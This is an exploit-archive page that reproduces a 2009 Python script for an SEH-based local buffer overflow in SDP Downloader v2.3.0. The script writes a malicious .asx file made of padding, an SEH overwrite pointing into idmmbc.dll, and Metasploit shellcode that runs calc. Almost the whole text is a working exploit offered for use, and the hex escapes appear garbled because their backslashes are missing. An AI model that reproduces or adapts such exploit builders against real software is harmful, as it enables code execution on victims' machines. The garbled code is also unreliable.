Home / os / win10

sdpdownloader230-overflow.txt

Posted on 28 April 2009

#usage: exploit.py #[x]Note: In this case we have the problem of the safe_seh, but if the machine uses (idm) # and the option "Use advanced browser integration is selected,then idmmbc.dll will be loaded the most of time. print "**************************************************************************" print "SDP Downloader v2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH) " print " Founder: Cyber-Zone" print " Exploit code: His0k4" print " Tested on: Windows XP Pro SP3 (EN) " print " Greetings to:" print " All friends & muslims HaCkers(dz),snakespc.com " print "**************************************************************************" header1 = ( "x3Cx41x53x58x20x56x45x52x53x49x4Fx4Ex3Dx22x33" "x2Ex30x22x3Ex0Ax0Ax3Cx45x4Ex54x52x59x3Ex3Cx54" "x49x54x4Cx45x3Ex65x78x70x6Cx6Fx69x74x3Cx2Fx54" "x49x54x4Cx45x3Ex0Ax3Cx52x45x46x20x48x52x45x46" "x3Dx22x68x74x74x70x3ax2fx2f") header2 = ( "x2Ex61x73x66x22x2Fx3Ex0Ax3Cx2Fx45x4Ex54x52x59" "x3Ex3Cx2Fx41x53x58x3E" ) buff = "x41" * 529 next_seh= "x74x06x90x90" seh="x89x69x01x10" #idmmbc.dll #seh = "x43"*4 junk="x44"*50000 # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com shellcode = ( "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44" "x42x50x42x30x42x50x4bx38x45x54x4ex53x4bx38x4ex47" "x45x30x4ax37x41x50x4fx4ex4bx58x4fx54x4ax31x4bx58" "x4fx45x42x32x41x30x4bx4ex49x54x4bx48x46x43x4bx38" "x41x30x50x4ex41x33x42x4cx49x49x4ex4ax46x48x42x4c" "x46x47x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" "x46x4fx4bx33x46x35x46x42x46x30x45x37x45x4ex4bx58" "x4fx55x46x52x41x50x4bx4ex48x36x4bx48x4ex50x4bx54" "x4bx38x4fx35x4ex31x41x30x4bx4ex4bx38x4ex31x4bx58" "x41x50x4bx4ex49x38x4ex35x46x52x46x30x43x4cx41x43" "x42x4cx46x46x4bx48x42x34x42x43x45x48x42x4cx4ax47" "x4ex50x4bx48x42x34x4ex30x4bx48x42x47x4ex51x4dx4a" "x4bx38x4ax46x4ax30x4bx4ex49x30x4bx58x42x38x42x4b" "x42x30x42x30x42x30x4bx48x4ax36x4ex53x4fx55x41x43" "x48x4fx42x46x48x55x49x58x4ax4fx43x58x42x4cx4bx37" "x42x35x4ax46x42x4fx4cx48x46x50x4fx45x4ax46x4ax59" "x50x4fx4cx58x50x50x47x35x4fx4fx47x4ex43x56x41x56" "x4ex56x43x36x42x30x5a") exploit = header1 + buff + next_seh + seh + shellcode + junk + header2 try: out_file = open("exploit.asx",'w') out_file.write(exploit) out_file.close() raw_input(" Exploit file created! ") except: print "Error"

 

TOP

Malware :